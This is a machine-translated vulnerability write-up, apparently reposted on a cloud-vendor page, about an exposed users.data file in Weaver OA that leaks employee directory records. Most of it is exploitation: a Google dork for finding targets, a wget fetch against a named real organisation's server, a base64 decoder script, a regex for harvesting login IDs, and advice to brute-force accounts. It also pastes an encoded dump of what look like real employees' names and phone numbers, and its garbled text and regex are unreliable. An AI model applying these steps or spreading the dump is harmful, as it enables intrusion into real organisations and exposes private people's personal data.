Home > Cloud Computing > Cloud Security

Unauthorized access to sensitive files in the Weaver OA system

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Unauthorized access to sensitive files in the Weaver OA system

Unauthorized access to sensitive files in the Weaver OA system can lead to leakage of organizational structure information of all employees and be used for brute force cracking and other exploitation.

Problematic file:/messager/users. data

No statistics are made on specific versions. This issue exists in most of the versions obtained on google.

Threat: information about the organizational structure of all employees may be leaked, including loginid, name, phone number, mobile phone number, email address, profile picture uri, department, and position.

The users. data file is base64-encoded and does not know what to use.

Verify url: http: // target/messager/users. data

The obtained content is similar:
 



After decoding:
 



There is also a log leakage problem, which may have been mentioned. If the leaked log contains a loginid, it can actually be cracked by brute force. As long as you log on to an account, data of all employees can be exported.

Base64 decoding:
 

#!/usr/bin/ python# -*- coding: utf8 -*-import base64fp1 = open('users.data','r')fp2 = open('users.data2','w')str1 = fp1.readlines()for line in str1:    str2 = base64.b64decode(line)    fp2.write(str2)fp1.close()fp2.close()



Extract available regular expressions such as loginid or bs4.

Extract the available loginid regular: \ B (? <= ) \ W + (? = ) \ B

The backslash is escaped. Remember to remove it when using it.

 

Search for keywords on google.

Intitle: collaborative commerce system inurl: login
 



For example:

Oa.hnnc.net: 82/login/login4.jsp

Wget http://oa.hnnc.net: 82/messager/users. data
 



Some base64 data is as follows:
 

PHVzZXJzPg0KPHJvdz48aWQ+NzYzPC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPrLc896+6TwvbGFzdG5hbWU+PHNleD4xPC9zZXg+PHN1YmNvbXBhbnk+vK/Nxdfcsr88L3N1YmNvbXBhbnk+PGRlcGFydG1lbnQ+vK/NxdDQ1f7Iy8Gm18rUtLK/PC9kZXBhcnRtZW50Pjx0ZWxlcGhvbmU+ODY2NzAwMTg8L3RlbGVwaG9uZT48bW9iaWxlPjE4NjM4NjkyOTE1PC9tb2JpbGU+PGVtYWlsPjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci91c2VyaWNvbi9sb2dpbmlkMjAxMzEyMjYxODA3NDYuanBnPC9tZXNzYWdlcnVybD48c3VwZXJpb3I+tsW35Twvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+ODwvc3VwZXJpb3JpZD48am9idGl0bGU+0NDV/sjLwabXytS0sr/X3LzgPC9qb2J0aXRsZT48L3Jvdz4NCjxyb3c+PGlkPjU4OTwvaWQ+PGxvZ2luaWQ+YTAwMDEyPC9sb2dpbmlkPjxsYXN0bmFtZT7N9dHgPC9sYXN0bmFtZT48c2V4PjE8L3NleD48c3ViY29tcGFueT6608TPyPC+9Mb7s7XP+srbt/7O8dPQz965q8u+PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PsjwvvTG87ncsr88L2RlcGFydG1lbnQ+PHRlbGVwaG9uZT48L3RlbGVwaG9uZT48bW9iaWxlPjEzNzgzNjcwNTc3PC9tb2JpbGU+PGVtYWlsPjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFnZXMvaWNvbl93LmpwZzwvbWVzc2FnZXJ1cmw+PHN1cGVyaW9yPsH1yPC7qjwvc3VwZXJpb3I+PHN1cGVyaW9yaWQ+NDM2PC9zdXBlcmlvcmlkPjxqb2J0aXRsZT7I8L70xvO53LK/vq3A7Twvam9idGl0bGU+PC9yb3c+DQo8cm93PjxpZD4zPC9pZD48bG9naW5pZD48L2xvZ2luaWQ+PGxhc3RuYW1lPuqwt8k8L2xhc3RuYW1lPjxzZXg+MDwvc2V4PjxzdWJjb21wYW55PryvzcXX3LK/PC9zdWJjb21wYW55PjxkZXBhcnRtZW50PryvzcXX3L6tsOw8L2RlcGFydG1lbnQ+PHRlbGVwaG9uZT4wMzcxLTYwMTAzMzc3PC90ZWxlcGhvbmU+PG1vYmlsZT4xMzYzMzgzOTg3OTwvbW9iaWxlPjxlbWFpbD48L2VtYWlsPjxtZXNzYWdlcnVybD4vbWVzc2FnZXIvaW1hZ2VzL2ljb25fbS5qcGc8L21lc3NhZ2VydXJsPjxzdXBlcmlvcj65+ce/PC9zdXBlcmlvcj48c3VwZXJpb3JpZD4xMDU8L3N1cGVyaW9yaWQ+PGpvYnRpdGxlPryvzcXX3L6twO3W+sDtPC9qb2J0aXRsZT48L3Jvdz4NCjxyb3c+PGlkPjQ8L2lkPjxsb2dpbmlkPnhzZ3N6amJ5c3k8L2xvZ2luaWQ+PGxhc3RuYW1lPs/6ytu5q8u+19y+rbDs1KTL49SxPC9sYXN0bmFtZT48c2V4PjA8L3NleD48c3ViY29tcGFueT6608TP0MLKwLzNxvuztc/6ytu3/s7x09DP3rmry748L3N1YmNvbXBhbnk+PGRlcGFydG1lbnQ+z/rK29fcvq2w7DwvZGVwYXJ0bWVudD48dGVsZXBob25lPjwvdGVsZXBob25lPjxtb2JpbGU+PC9tb2JpbGU+PGVtYWlsPjwvZW1haWw+PG1lc3NhZ2VydXJsPi9tZXNzYWdlci9pbWFnZXMvaWNvbl9tLmpwZzwvbWVzc2FnZXJ1cmw+PHN1cGVyaW9yPrn5x+w8L3N1cGVyaW9yPjxzdXBlcmlvcmlkPjQyPC9zdXBlcmlvcmlkPjxqb2J0aXRsZT6yv8PF1KTL49SxPC9qb2J0aXRsZT48L3Jv



After decoding:
 

 


We can see that there are more than 7000 rows of data.


Companies need to check their own information.

Solution:

1. The users. data file does not know what it is used for. It is not recommended to store it in the website directory.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More